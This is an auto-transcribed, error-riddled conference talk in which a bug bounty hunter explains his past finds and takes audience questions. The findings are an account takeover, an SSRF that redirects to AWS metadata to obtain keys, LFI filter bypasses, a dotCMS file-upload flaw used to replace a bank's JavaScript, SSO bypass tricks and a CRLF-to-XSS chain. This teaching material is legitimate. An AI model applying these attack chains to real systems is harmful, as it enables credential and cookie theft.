Bug Bounty on Steroids

so well we have someone coming up with tips to up your game and much more so if hacking is an art we have a very talented artist coming up next our next speaker has been in this industry for over 10 years CEO of web immunify winner of multiple events at hacker one Integrity bug bash and many more and for the very first time at besides Ahmedabad Hussain thank you hey everyone thank you for being here so before we start I'd like to take a minute to thank the organizers of this event for inviting me over here so obviously when I started back bounty in the first like 2014 2013 my first friends in back Bounty were

Indians so it's really an honor for me to be here with you today thank you thank you for being here thank you So today we're going to talk about backbone tea and the name of the talk is back bounty on steroids I'm going to try to Showcase some vulnerabilities I have found over the last year and try to explain and try to see um how did we end up finding this vulnerability and how did we think about the vulnerity in the first place because obviously you might see sometimes some applications some endpoints and you don't know how to start or where to go or what exactly to look for when you look for it so we're just trying to go

and try to to to explain this to you today so before we start my name is yusendaya I'm a Lebanese living in West Africa and Ivory Coast Hunter security researcher I'm Yahoo Elite if you know that Yahoo has an elite section I have won the late the Integrity lead up in this year the the first one the Apache series swap and also vigilante award 2010 a hacker one event also best in collaboration background backbash best in collaboration I have more than one thousand reliabilities reported all together on on all power platforms combined so um let's just see the big titles of the talk so first we have I can't take over via confusion we have transport tables

server side sequence surgery we have local file disclosure and bypasses Hiking a bank by fancy Casey Roode and SSO bypass techniques so to those who know me here you know that I love going for server-side issues server side vulnerabilities so that's what I love going for and we're going to have a lot of this today in the talk and trying to get them really well explained to everyone so if anyone does have any question why we go through you can just raise your hand I will make sure to stop and try to explain more so let's start are you ready you have the first talk here the first big title I can't take over via

confusion so I was high on this application which is a public hacker run program and the application allows the user a to invite user B to his organization and user a is able to ask for a password reset for the account he invited and user b gets the reset token link to his mails so um instead like this it doesn't look really obvious but if you go from the hack your mind you might think that there is something to do here so just think about it for the sake of this report we can't like show screenshot because the company might show me might sue me really really quick so we're just going to try to imagine how it's going

you're invited you have this application where you have an organ organization and then you're able to invite someone to your organization and you're also able to click on a functionality that says okay reset password for his user and once you do so the user is going to get a reset link to his email so um this is something that you might see in your days of big Bounty because nowadays you have a lot of application where you have a lot of organ organizations you just like sign up have an organization invite users remove users and stuff and um how can we try to exploit this so here's the proof of concept I came with user a

which is us the hackers we invite user B to his instance to our own instance where user B is his second email address so you use a a new control email of user B you're going to invite user B to your account to your organization and then as a hiker you ask for a password reset for your own second user B which you have previously invited after that you go and you just copy the link to user B email address and you just save it for for a second as a hiker you go back to your account and you just like change your mail change the email of user B to the victims accounts email and then once you

open the the reset password link you got previously what happens but you get icon takeover really easy and really quick so this is like a sum up for for this you are just like user invitation to user B to join his organization user a again password preset inside the application just like for password reset so um as we can like post screenshot of this because the application is really has really strict them and you might know where or which application it is I'm just like um trying to Sprint like this but when you have some kind of this account this kind of organization always looks for the functionalities that might be abused you know because it might not seem

obvious to to others but if you spend time you just read the documentation you just like try to play around with the functionalities and the and everything you have in your hand it might lead to something that's exploitable you know so always try to stick to to to to the functionalities to the documentations and try to gather all the functionalities you can have in your account and so as we said user B just saves the link to the password reset and then as a hacker you can you change back the email of user B to you victim's email and once you open the reset password link magically it goes and reset password for the user

C so that was a confusion because what was happening in the application the side they had two kind of separate databases looking so when you sign up your user is going to get assigned another user on another database that was like SSO thing so once while resetting the password and changing the email back one email was getting updated in one database but it wasn't updated in the second database so what was happening that you could just like take over the account and the Bounty was 4K for this one not much huh let's just go forward and go for server side request version which I love a lot I had this application and after you know doing everything you might know of

trying to gather on points trying to call the applications I had this specific request and when you see the parameters here is there anything that catches your mind I think there is something that's really obvious that you might see every day in other applications there is nothing that like can catch you and directly but once you think about it the region parameter looks really fishy because when you think about regions you just say oh that's like Amazon yeah because you have all these regions and you have all these applications getting connected to it in the back back end and so uh it's cool to have some requests like this when you can try to play a bit with

so my testing methodology for such endpoints first we set a random value inside the revision parameter and you look for specific um specific responses or specific behavior of the application in our case here once I just like change the region parameter to test or any string that you want the result was a timeout response from the application so that it catches your mind directly you might get like 404 or you might get other 403 maybe so this is also something you have to to look up for and try to get keep in mind when you try to change the parameters value and you see like a huge change in the pages response you have to tell

yourself that there is something going on here that we might be able to exploit so as we said here we had the timeout response from the application that's fishy um just freezing a little bit a bit after that I did a little list containing different payloads to hopefully find and identify some interesting Behavior I have this host which is called zerosp.cc which I own and I gathered a bit of payload that I wrote myself put them in a list and just like start filling the the parameter and see what's going on here so as soon as I send the freezing list when I send the list I have this payload 0xp.cc and data and the sludge at the end

which triggered like a DNS response from the server so that's really interesting because now if we're getting some genius interaction we might be able to do something interesting so from here you know that you're on the right path you might be a little bit far from the result you want to achieve but as soon as you get like the gns Callback you know that it's going to be a good story the application what's happening in the back end when you see that you know that something's happening from the backend because I didn't hear we had a ping back to sns.0xp.cc it's really interesting to mention it so when we enter the payload we got the Dennis call back to this

specific host which is sns.mydomain so that's really important for the next slides because now what I do usually when I get this kind of stuff I try to think around and try to do to gather as much info as I can to try to be able to know how the application is handling my input as for here the application looks like to be sending to be reading the region parameter value and issuing the following request which is get sns.thevalue of the region that Amazon aws.com and from here I think it looks obvious how the expectation is going to go this is directxp.cc and slash in the payload we have the following request being issued by the server which is

sns.zerexp.cc and we have a sludge that's breaking the Amazon host forward we're breaking out of the syntax how can you break out of this syntax so for this we had two options first option is really easy you just go create a host create a subdomain for your domain sns.zerexp.cc just create it use the previous payload and bomb you get what you need here but I didn't think about it really quick and after sending the report which is this kind of pillow that I used I just like was yeah I could have done it easier you know I could have gone for this but you can't have all the ideas at the same time you know so what

works for you just go for it it might end up paying well the payload here is anything and you add zrxp.cc and sludge after that so the server's translation to that is that the SNS X at seriesb.cc slash dot Amazon aws.com so this way we broke out of the SNS subdomain we specified our own domain and we escape it from the host Amazon AWS part so um after I got um this idea I'm sorry for the images I'm not sure what's happening but yeah I'm going to try to explain so I tried with google.com with the same payload and um by Miracle just it it gave me back here the google.com content like proof or not found

and now I know that I'm definitely on something and I'm on the good road we can just go further with that good uh but but it's not in us how can you read AWS Secrets located at the AWS API endpoints you all know of the application is doing https request while for this we have to use HTTP because Amazon is not going to to accept https request to date pretty easy we're going to use a redirect to just first like from https back to http and just like give us the key so we have this payload which we came up with so um you all know about the local domain.w PW domain just sitting like a 301 redirect

and redirect to Amazon host on HTTP again with all these um the parameters that's needed so uh before the very true to http and we have this application and here is the applications request which says okay SNS at um and the whole bunch of um stuff we were coming up with we had the bus redirects here so first the application is going to gather the content from local domain.pw and then from there we get back to um how to say to Amazon AWS but we still have a problem here the application request here is sending like the amazon.ws part in part of the request now because we have escaped it uh via the the sludge but we don't want it here

so easy one here we just have to add the question mark to escape this part and get it out of the of the of the way for the Amazon um and just by doing that bam there is a little summary of what's Happening we have the application parser sending the request we have the 301 redirect and we have finally the last link the application is going to to boost and give us back the content with the escaped quotation mark to escape from the dot amazon.m AWS thing and here we go luckily we just get the keys and that's what you want to do but for that like okay the application was here for years and years but no one

found it why because no one tried to notice the little um the little details you have to really think about how how where did I see that did have I seen that before can I exploit this in somewhere some other way if there's something I can do here and this was a Spirit Away server side request forger with some kind of um trickery that we have used to for that so we're finishing this service request surgery is there any questions so far for it here [Music] seems like everyone got it on let's go forward so we have the other the second topic of the talk is going to be local file disclosure bypasses I always find this

local fine inclusion local fire disclosure and you just get like 403 go home and you're not going to hack us today that happens a lot right and I had this application here which with this 1.0.php if I equal document.pgf the first thoughts put our cell local file disclosure local file inclusion maybe remote file inclusion you might think of too so there is a lot of things that comes to mind but yeah I'm going for local 56 user here the classic payloads we all know of we're going just to do file dash dash Etc password if it's a Linux machine or maybe going just like first thing on payload or this third payload it all depends about what you're hiking on but

yeah sadly we got for Trafford beaten here so we can pass the server doesn't look like to accept that sludge here so what can we do it all depends about the applications but a lot of the time what I have been what have been working with me on PHP application most is like unique code on coding the dots for example or unicorn encoding the dash the the sludge or better nearby between the dots so let's see how it works so we have um this website here cass.wtf slash you just like you just give it an input and just give you back some unique translations of the the letter of the character you give and that might be handy too also for other

kind of attacks not only like server size because surgery or local fire disclosure bypasses but also like account takeovers you might have some some Unicode um not being interpreted very well so this is really handy um by just um encoding the training though on code that dot here we get this payload that you might be able to try in case the dot dot slash is blocked so we have this here which you might try I mean you never know what might happen in the back end you know we're hackers we don't have access to the source code so if you don't test you can't know you have to test everything you have um in your

hands your weapons here it's your your tries requests are so free no one is going to bill you for that so you just try it out and the nearby bypass here is trying to do like um dot nilbyte dot and you just like go for stuff like that and it's not only to say that this is um what this is what I found um recently but in other cases you might also try some other kind of stuff you might think about not only nearby maybe trying encoding some kind of other characters in the request and trying to send it so and here by sending the payload you can see here the dot and we have the nearby

it and download PHP and this one worked very well and gave me access to the application source code so um what we're trying to explain here is not that these are two bypasses only that you might use just to give you the the ideas between behind like bypasses and how how you can try to think and try to come up with other payloads because you have to use a lot of creativity to to be able to achieve this kind of things so we're going forward and this is an interesting topic which is hiking a bank by finding zero day this vulnerability was in collaboration with shops you are no infosec are you I guess so and uh are

you really a hiker if you have never hacked your bank that's the question huh and the story of cvu 2022 26352 I was invited to this backbone chip program that uh was owned by a bank all the assets were bank and they just said okay all the subdomains are in scoop just go for what you want and let's let us know what you find and the first thing first I started doing a week on so um while doing recon Gathering subdomains working with applications cms's what are what is being used in the back end we found that the application is using mostly a CMS called dot CMS which is um Java Java based application and my

made for Java application is called tubes you know so I just like hit jux and I say okay man uh you have to to work with me on this one so what is dot cms.cms is an open source content management system within Java for managing content and content driven seats and applications so the application so the bank here was using this CMS which they edited a bit you know for the needs for login for banking purposes mostly not for the Casual purposes and just like um using it or almost like 100 sub-domains of them on different servers so every sub domain using that CMS was just like isolated from the others one it wasn't like one

single server everyone was looking for low hanging bugs because it was the program was has just launched you know so everyone is going for automation trying to nuclear here nuclei here with basic templates like many people do and obviously you're going to get duplicated nuclear is really really powerful as you have seen the other talks but you have to be able to create your own templates and try to find your own bugs and trying to look for them in other hosts because obviously if you go for only um the the templates that are available there is a high chance that you're going to get duplicated and I can tell you that people that are doing automation

right now in the industry they're really good so like trying to outperform them like just like with two or three bash line scripts that's not going to work at all so if you want to go for automation you have to make sure that your automation is like another level because when you see guys like Eric for example today is new I mean he built a hiking system on his own you can just come and start using you play uh public templates and try to overcome and overpass him that's not going to work so as I've I know that I said okay man let them look for the term place and let us like dig deeper into the application

see what's going on and we chose to download the CMS and try to go for some white Source um auditing and try to find some interesting behavior on the application of veneabilities the file here at um content resources.chiva have this little snippet of code here which tells us that we don't need authentication for certain apis and then that's interesting because if for this specific path of the API we don't need authentication in case we find something interesting we have like an unauthenticated remote common execution or you need to educated server-side request version you know and that at this point you just came over there's no no reason the big bouncy program is not going to go forward with

your bag and so we had the new educated access to API and we also found that oops there is an arbitrary file approach somewhere in the API so the CMS is highly tested the dot CMS you might check it later but a lot of people a lot of hikers who audited the source code they missed discern abilities because it was like really hidden in the inside the code and so you had this snippet of code that tells you that okay so there's this on point on the in the inside the API that you can use to profit so that's a game over for them we just get forward now we have big one please press two so if we have

authenticated access to API and you have arbitrary file upload and so connecting the dots you have an authenticated IP and hybridified Report maybe remove common execution in case one thing in case the directory of the web server is right table because if it's not writable it's going to be ASL here is the request we had building a proof of concept we had this request to slash API such content which you can access without any authentication and we just tell it okay I want to upload this file and what we did in the fight that we're doing past reversal inside the web root directory for the file to be uploaded in the web server directory when we can access the the shell we are

approaching and so here we just have like the GSP child code we can just like enter and uh sadly for us for this program the web directory was not rightly believed would have been too easy right and what we started doing that we started enumerating python directories to see which is writable and what can happen what we can do with that we identify we identified this certain Behavior where 500 error and size 0 so there is no no content from the server file was written successfully so as you can see here I'm not sure if you can see but it says like let's cheat TMP slash uh you send slash my handle and it's just like 500

okay 500 server error and the file is written here and in case we get 500 500 error and the application says could not be created so the directory does not exist at all we can't have also create directories permissions and in case we get like denied directory exists but we don't have uh the rights to upload the files to this territory specifically so as for example here we try to upload like to proc uh self cwg which is current working directory to try to upload it there but no luck web predatory not for table rip no remote command execution set for us other solutions that we might use to achieve other great impact to show the

application the background oops Yeah we didn't get remote execution but because we couldn't find any writable directories but yeah we can do other stuff let us show you we have found that we're able to replace um jar files Java files because it was running like tomcat and so you have some points that you can replace and in case you lose the system reboot your remote command execution is just going to get triggered with the reboot or we can also replace system files some of them were writable or you can also adding system config files to the server maybe uploading SSH security dancers and stuff like this but we choose another way after digging a bit deeper we found that

remote communication is not possible but we have to prove more impact solution we have found that we are able to use a gadget to replace JavaScript files on the server so what does that mean that means that by using the renewability we're able to replace any JavaScript files on the domain so basically stored xss on the whole banking assets like all of them so if you have stored xss without anything you have access basically to everything and anything and it was a huge bank so the traffic here is pretty pretty pretty much so how to we found that by opening a JavaScript file in the browser and looking in the response headers we had a

certain IG that was tied up to the Javascript file which is like um one when a developer a project Javascript file it just like gets an ID in the database of it and so that ID was getting sent back in the headers of the response and the the ig's header name was itag in the headers so we had to approve the file as follow file name equal and we found that we had to do like first chart of the ID then second show of the ID then the full ID and then the file name we had to save too if you go forward you can see here then the e-tag for application slash projects.gs slash this specific file was

um itag Dot and this random string that was given back to us so yeah so this is how we replace JavaScript files we just like uh dot sludge to escape out of the thing and the first Char second share of the IG the full ID and the file name and pass and this way we were able to replace the Javascript file you can see here that we included a little of console.log with our own handle so every time you just visit the bank website path we get the cookies back we don't do it actually yeah so um for this part it's really interesting to know that collaboration can lead you to so much interesting Pathways you

might be like trying to hack an application and not finding any solution trying to bypass what you're trying to hack on but as soon as you just like go forward and ask some friends that have a bit more knowledge about something specific it might have the solution to your problems so you don't have to like just regular loan at the end of the city collaboration just like keeps you motivated it keeps you hacking more together it brings a good friendship between you and also more bunches because the next day if your friend finds something he can't expert he's just going to tell you oh please come hike with me try to help me here and if

you know the solution to the issue just going to help him and that's going to really good momentum and so um for this book I was a bit disappointed by the by the how to say by the Bounty because we had like the same memorabilities on like 100 different sub domains so totally different servers and the company decided to reward like 15K for this one so still good but not enough for the for a big Bank we go forward here for SSO bypass techniques so this is going to be interesting shall we enter every time you just go to an application admin.corp.com and just like boom man octar you can pass or you just get like

another kind of um SSO and you just can't it says like you don't pass you shall not pass man nowadays most organization used as a super internal panel logins and restricted resources but does it mean that you just stop here if you open up a subdomain you just found it it says like SSO or some kind of panel you just like stop it here you don't have to have to go forward because even though there is SSO order kind of authentication you might be able to bypass it using some other techniques and try to access the restricted content and have access to the to the panels what it might be handy to do in these

cases it might be handy to put first directories look for read passwords maybe on linked database after as Adam said later in the morning early in the morning sorry and uh you might try to hit apis directly maybe if you can find some on Gau tool you might find some endpoints to try to hit directly and see how it responds or other offensive factors we'll be talking about today using um don't only look for the iteration files but also with first parameter on the files okay so let's say we have you have the sub domains which redirects for OCTA you know and you go for you start proposing the the domain for the reason files and

you just find admin.php which is like a a valid file but it just like keeps your diet keeps sending you back to OCTA you have to try at least what I do is that I try to gather to try to Brute Force parameters on the specific endpoints even though it does send me back to OCTA you might have something like admin.php and the parameter that says okay logged in equal true that might just like tell you okay you're in you know you don't know what's happening in the back end so this is little um overview of what's Happening like let's say you have this domain admin.org.com and you have it's sending you back to OCTA you have admin.org.com

you have this one slash and turner.php which says 301 retired so here you know that the file exists because for the previous file we didn't have it we have a 404 note form so you know that this one it's here but you just have you just don't don't have access to it and when we try to boot first for parameters we just get like IG equal one and Bam 200 okay even though you don't have access to the full panel you just have access to a limited resource but it's still enough to prove impact and to try to gather other on points maybe you might find other on-premes in the response that you might I can look for

parameters on and keep like crawling like this and keep like expanding that exercise that you have apis here as you have seen said earlier JavaScript files is like a gold mine and that's true 100 percent JavaScript files contains so much data so much information that you might miss if you're not reading if you're not spending time trying to understand how the application is working like server side and downpoints that are mentioned there we have um this this is like pretty simple you have just like 200 okay to SSO and um once you just like look up for the content Source you just see this different you know the different JavaScript files you get on the panel and the server side uh the the

right character is on like uh client side you know and you just find a casual endpoints just try it and you get like 200 okay so that's really important to look for so less known um I'm going to talk about some techniques that I have been using um in the last year I haven't seen much um information about them like on in the internet so I thought that it might be handy to share it with you here so what I used to do when I saw like panels that had authen education like SSO stuff OCTA and you can just like go in so I just gathered a list of parameter of uh endpoint sorry of extensions so

you have.php.gpg.png and all this stuff.jis and just like gather it all together in one single word list and I try to report first the the password I get redirected to other SSO swings or October stuff and at this point when you try to hear with the uh extensions so PHP you get 403 HTML 403 and all other things 403 but gpg says like oh 404 that's interesting because like okay the application might be blocking all the kind of extensions because they don't want you to access this but this is okay gpg files like image files nothing sensitive in that you can access it if you find something that's living in our directory having a gpg file just access it

so in GSP applications this might be handy you have already seen the same period with DOT uh like just having the comma the column at the end and stuff and what I've been doing recently this kind of payload so I just take one the panel that's getting me redirected to Brute Force for extensions and then the one that gives like a different response to the others I'm just going to stick it like this and try to access the panel like this I've had quite a luck on some private programs with some GSP files like this it doesn't always work but it's always like worth it right because you never know well you have so this is like a little recap

of this um big title so you have internet.org.com that gives you SSO you have them test.gs again SSO and when you go to test.gpg for for a new phone not phone this is really different from what we used to see so if we just go to internet.org.com with the payload being included here we get like 202k because the server is syncing okay this is a gpg file and we said that okay GPS are not harmful you can access gpg file and so as uh as this we're able to access the admin panel on the server other fancy vectors that I've been using too recently so you have this internal.org.com that sends you back to SSO

why doing just like looking for the cname of this specific domain I just find okay this like all the third party.com or completely another domain.com that's not like the companies by using again ju and try it together on points we buy curiers and stuff you can't find another subdomains on this that same cname domain which says okay notifications register that leaves like in one of the subdomains and you might think okay maybe I can like gather all these endpoints that are living on this specific domain and try to put for them on my Target and see how how it goes and luckily you just get 200 okay you can just sign up easily so this is uh this was one of the bags I

found on some programs and just by doing that by trying to check the cname reversing and just like checking the endpoints on that domain Gathering them all together bringing a word list put first thing on my target I just got that authentication slash register which was living under the my Target and so I could just like sign up and get access to the panel the last title of this talk is going to be another cross-site scripting level I love mons things are interesting I don't have one it's easy because you have more fun when it's but it's difficult if it's just too easy just come on just do this stuff and you go that's not fun at all you know

so we had um this specific JavaScript file which has um okay so we're going to take an ink parameter here application expects an ink parameter and the host name supplied in the parameter has to end with DOT org .com and the path of the separate parameter URL should start with Slash includes slash jscdn and so the application once you just reply a valid payload for this um for what is expecting is going just to get to to get the content of the file and include the script on the page what do we need we need something that looks like this subdomain.org.com includes slash the specific gstg and file node.js which will contain excessive payload such as alertron

at this point you just think okay let me search for subdom and takeover but what happens if you don't have that's the interesting point here if you don't have one maybe you will try to get moon execution on some other subdomains and try to maybe write the files even though you don't have the permission to that's not a good way you have to try to chain all the vulnerabilities trying to gather other data that you have saved while hunting on the application seeing what might be used to to finally pop the alert supplement takeover create the further 100.js file no luck no takeover if there are any other possibilities so while hunting on the same Target I

found that another subdomain of the target had a Serial vulnerability at this point we had this subdomain here and by doing that we get get serial F every easily so what happens if we do support.org.com and the CRF wasn't on the endpoint but it was like an application Level issue so any path had this specific serial F so what happens if we do that we just like do we just include the pass the vulnerable script is expecting I'm adding like the the CRF after that with the with the content we want to to do and here we just go okay so let's use the trf to host the file the file that we will be using to

um cross load on the other vulnerable endpoint and check how it's going so we put this payload which says okay set content type equal applications JavaScript and also set alert from alert at the end like on the start of the file so um at this point you can think that okay we're just going to include that link inside inside the parameter and that it might work but once once I try to do that I had a problem here because there was the course issues the application wasn't letting me um load that other subdomains because of course issues what can we do here let's set uh let's set Access Control allow region on the serial F so here we just like use

the serial first to set the access control all our region we also use a CRF to set the content type also use a server left to set tools to to read the payload alert and like in the start of the file and now we can just use that to cross load and just like yeah and here go back and finally we have it popping so uh yeah I just wanted to mention also that we're launching um Bobby Minify which is a Panthers company so if any of you guys need an opinion test you can just contact us uh thank you question so this is really thank you so much

so this is an iceberg and you can see that the discovered when we're bridge is is really small and yet to be found remember which is really huge as Yasin said earlier I hate good hacker when it comes to a program just see like 1000 priorities found that's nothing that's nothing at all because I think differently than you you might think differently that other person everyone has his own techniques everyone has his own mindset for hiking so what you might find other might not find so you just go for it and test it don't know what might happen there I'm here to now answer three questions

thank you for the light

any questions yeah hello sir sorry where are you so from here okay man hey thanks for the doctor I have to uh only two questions that I I'm asking from the morning sorry can you uh yeah I can hear you I have two only two main questions that uh I'm and those two questions I am asking for from every fantastic that I know yeah first question is uh how to get to know the non mainstream bugs like we know about the accesses we know about this equally but there are non mainstream works like Pi the oauth 2.0 which we really don't know can you repeat what kind of vulnerabilities you're looking for oh actually I meant to ask is how do we how

do we get to know the non-managing bugs how do we get to no not the name of non mainstream bugs than mainstream bugs yeah yeah not mainstreams it's like the first vulnerability we have tried to Showcase here which was like and I can't take it very confusion no these are like assets I know about right no no the first one where you're here the first title of the of the so it's like business logic issues you're looking for kind of kind of yes yeah that's by reading documentations mostly so if you don't read the documentation and you don't understand how the application works you might not find what is not expected but it's not mainstream by reading the

documentations and trying to understand how the application works you might be able to understand that oops okay this is not intended so I might be able to try this and if it works this is the vulnerability if you don't know how the application a lot of hypers just go and say okay I have this application I'm going to I'm hacking on no problem I'm just going to try SQL injection cross side script things and they just keep the business logic issues while it's really interesting to look for them because less people read documentations and try to understand the application purposes so the second question is before hunting a bug you have to know the bug and

before knowing the bug you need to follow a certain type of framework certain type of steps I want to know what are your steps to learn a certain kind of work you have to go to I didn't get the last part sorry I want to know about the methodology how you learn about a bug how I learn about the bug which one any kind of work like say there is a new zero to come and you have to learn about it uh so what are the steps that what type of framework do you follow to learn about the bug yeah for example first figure does a lot of labs and there are a lot of like techniques showcases on

blogs and they do a lot of labs so I think they cover up much pretty much everything so you just have to go and try to replay the labs try to think uh how why it's working and don't cheat you know so just try the labs on your own if you don't get it you can go and see the solutions go to the other level also try hack me the platform also those really great work for learning might just like go learn even or reaching try to reproduce um the most important practicing on real targets just take some big targets like with a lot of in-scope domains like Yahoo for example everything is in scoop there and

just try to to replicate that's going to be a good a good way to start yeah there's someone in the middle I think

hello hey man uh if we have to choose in between like a bug Bounty either or any certification so what should be our first priority any certification related or a bug Bounty because uh if we choose bug Bond they uh we usually don't get time for certifications and all the other skills like pen testing and networkings okay so if I get your questions so you're asking what you should do other big bouncy or certificates certificate like we should focus on skills or bug Bounty like sometimes we need to focus on skills uh like pen testing and all the other kind of depends what are your goals you have to know what you want to do

so if you if you just here to the back bouncy you don't need certificates for black bouncy but if you're trying to get a job or something they might ask you a certificate so you have to know where you're going so yeah yeah if you're trying to land a job as a pen tester for example some companies might ask you do you have certificates it might help you getting the job easily but if you're just like going to do full back bounce you don't need anyone to see any certificates of yours you just have your own skills you don't need any certificates but yeah that's really depends on your course what you're looking to do

uh I have another question actually I have a situation in which I was able to inject xss from crlf but the thing is the parameter dot is uh blocked from firewall like we cannot insert that so what should we best practice in what kind of attack crlf2 exercises yeah why do you need that like document or cookie okay but you can use others there's a lot of other things you might use can you do like two or three only just to pop an alert I tried some tricks but didn't work like most of the parameters are blocked by the firewall yeah you have a lot of JavaScript Alternatives you can use besides of that maybe also what you can you might be

able to do is like like trying to make the serial load another um script outside script where you will have your full payload do you understand what I mean okay so using the serial app to just like create a script that is going to fetch another script external script and then using it message me the unprint on Twitter okay I'll try to locate it do you have other questions first of all amazing talk loved it my question to you is that uh do you think that book Bounty can be posted as a full-time career and if yes then how do you deal with the mental stress and frustration so um can you do big bouncy on a

full-time career you can but are you ready for that are you ready to it all depends interesting thing is that if you're able to set some money that might get you secure for one or two years forward you can go for back Bounty but I don't recommend going for back bouncing full time if you can't like secure at least one or two years of monthly expenses of expenses life expenses because you don't know what might happen today you might find a lot of bags uh two months later you burn down nothing zero perks zero money coming in and you don't have anything to save so that's really complicated and how do you deal with the mental

frustration how do you free yourself from the exhaustion and all those things sorry how do you free yourself from the exhaustion or not finding bugs so what do you do in your free time I just like go look out that's it if I can't find boys I can't find both it means that my my mind isn't ready to to look for bugs it's just like you overwhelmed man it happens you're not robots if you just can't find bikes and you feel like you don't want to hug only hack when you you feel like you you want to hack not one you think that you have to hack only when you feel like it because if

you had because in your head you have to have obviously not going to be protective at all that's not and it's not going to be fun thank you my pleasure hi Jose so hello uh so my question is like uh you know many times while finding vulnerabilities on programs there are web application firewalls and like they are updated on like to the latest version so how do you usually find uh bypasses for them okay so first thing have you tried like looking for origin IP addresses yeah select uh from the web like you can get also all sorts of content like you know someone has just posted a bypass on Twitter or somewhere else and you have

tried all of them then what do you do like you know there is HTML injection and you can verify that thing but you want to escalate and like create some impact like maybe Crosshair scripting or you know you are trying for SQL injection and like it's not working due to web application firewall a particular payload you want to try and it's not working so how do you usually like try to bypass it so um bypassing I think it's not like something that you might be able to summarize in one answer because this is so big you know you have a lot of kind of bypasses recently when we had the Integrity event for the buff bypass

um contest there was a lot of great um great bypasses from other hikers even though I also sent some equivalent abilities and um other people were playing with haters or other people were playing with like um the main application just trying to fool the the wealth but what I always try to do first is just like I'm going to spend a lot of time trying to find the ocean IP so once for all I have the IP address the the original IP address then I don't have to break my head trying to bypass any payload for any future vulnerability I get either it be SQL injection or other vulnerabilities so now the question is that how do you

find the original API address in some application um I'm just going to Showcase like some techniques like out of my head right now first if the if you can get the ascens of the of the application you just like grab all the asns extract like all the hosts inside of this get the IP ranges and try to check for all live HTTP servers you get the title from your website and you compare to try to find the same title on the eyepiece this way you might find our original IP address another thing is that you might for example people when you if the application is using a mail server on their own server so when you do for

example password reset and you just like send it to an email on verb collaborator going to get an IP there if the application is hosting the Webmail on their own servers we're going to get IP there and you have a lot of other techniques there but um I will make sure to if you ping me on Twitter I will send you the links to the other hikers bypasses in the web contest and there is a lot to learn from there I learned a lot from them really great great articles yeah cool thanks thank you man my pleasure hey man yeah the light is blinding so yeah yeah so you can talk and interesting findings uh I just wanted to

ask about one of the bugs you showed was the CR LF injection yeah the exercise was using a sub domain does it also um like you can can you execute the script uh uh on from a subdomain like is it not same protected by same origin policy three is it not protected by same origin policy because the xsx the alert you posted was on on a subdomain and not the domain right yeah exactly that's why we we did at the access control hello headers so here uh can you see in red uh okay okay okay so we we just unload it using the serial F yeah yeah thank you

it's okay uh hello hey hey who's talking yeah where are you oh out there behind the lights man okay yeah yeah sorry about that yeah yeah it's okay what I want to ask is a pretty general question so the thing is like uh there are a lot of ways to approach a particular bug right for example LFA you have multiple bypasses for that like you can encode and everything like you showcased in your presentation exactly so just in case if the if the application is not vulnerable let's say like how do you stop a particular test case like it's pretty easy to get hung up on a particular test case and drive over and over again though how do you

actually approach this situation so can you repeat the last part so actually like it is pretty easy to get hung up on a particular test case since for any particular test case like you have multiple bypasses and multiple ways of approaching a particular bug yeah so how how do you make sure that you cover the maximum test cases and you know yeah I mean it punch is like return on investment of time so if you're going to spend like 24 hours on one endpoint and not catching something from it it's not worth it you know yeah so if you try different things for like for example for one hours for one hour you just try and it doesn't

work out it doesn't mean you have to stick to it you know that's a mistake I I also do I do it myself but you have just like save it off try to go hike on other things and then come come back to it when you you have more ideas to try there is obviously for for your for for as an answer to a question it's nothing it's never too much of techniques it's never too much it's not like okay I've tested this amount of techniques it's not working so I'm out no it's never too much you have to go to the end of what you you think might be working but yeah uh just like

one hour if it doesn't work out okay I'm out for today going to think again about other attacks coming back you know okay okay thank you that cleared up thank you last one here he was uh Lassie yeah it's been like one hour is like ah save me

foreign it was a nice talk thank you my questions are first of all how to bypass sandboxing how to bypass sandbox and what kind of sandbox on a website or web apps do you mean for example remote common execution sandboxes like when you the application is unboxed or yeah oh that's going to take a talk okay um okay then maybe let's skip to second question that is uh how can we identify Rabbit Hole vulnerabilities how how can we identify Rabbit Hole water abilities it's like we think that that is a vulnerability which will be on that we will be let's imagine that we are testing an application or for we are scanning it for bug Bounty and we try

some bugs which we think it were it can work but eventually it's not there it it won't work so is there any way that we can find it directly that these are the vulnerabilities which are not actually going to work even if it seems so it will work that's all by experience and also you can automate this kind of things for example you are taking some endpoints from way back users and just like automating crosstalk scripting on it that's going to be easy for you to know that okay all design parts are not vulnerable for that or SQL injection or if you're too mate you know but you can just like assume that something is not

going to work that's a really bad idea to assume that something is not going to work you have to give all your time try to bypass try to exploit something and if manually because you can't rely on automation too much if manually you see that it's not working then there is no way around you just like it's not working or maybe you don't have the the good skills yet to achieve it but in the future you just go back to it and you will find it thank you so much thank you everyone if I thank you thank you so much Hussein I'm very sure just that just like me everybody else has been looking forward to his talk and

it hasn't worth the wait correct let's give a round of applause for Hussein thank you